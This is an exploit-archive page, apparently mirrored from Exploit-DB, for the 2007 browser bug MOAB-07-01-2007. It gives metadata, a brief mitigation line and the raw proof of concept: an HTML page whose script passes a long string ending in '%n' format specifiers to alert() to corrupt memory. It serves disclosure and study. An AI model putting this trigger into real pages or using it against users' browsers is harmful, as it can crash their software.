header-logo
Suggest Exploit
vendor:
Not available
by:
LMH
7.5
CVSS
HIGH
Memory Corruption
119
CWE
Product Name: Not available
Affected Version From: Not available
Affected Version To: Not available
Patch Exists: NO
Related CWE: Not available
CPE: Not available
Metasploit:
Other Scripts:
Platforms Tested: Web browsers (affected platforms not specified)
2007

MOAB-07-01-2007

The exploit code causes a memory corruption vulnerability by generating a long string and using the '%n' format specifier in the alert function. This can lead to arbitrary code execution or denial of service.

Mitigation:

The vulnerability can be mitigated by validating input and properly sanitizing user input before using it in functions that can cause memory corruption.
Source

Exploit-DB raw data:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-07-01-2007</title>
		<script>
			/* LMH */
			function boom() {
				var str = 'A';
				while (str.length <= 32) str+=str;
				str = str + '%n%n%n%n%n%n';
				alert(str);
			}
		</script>
	</head>
	<body>
		<input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
	</body>

</html>

# milw0rm.com [2007-01-07]

Navigation

Suggest Exploit

Services By CQR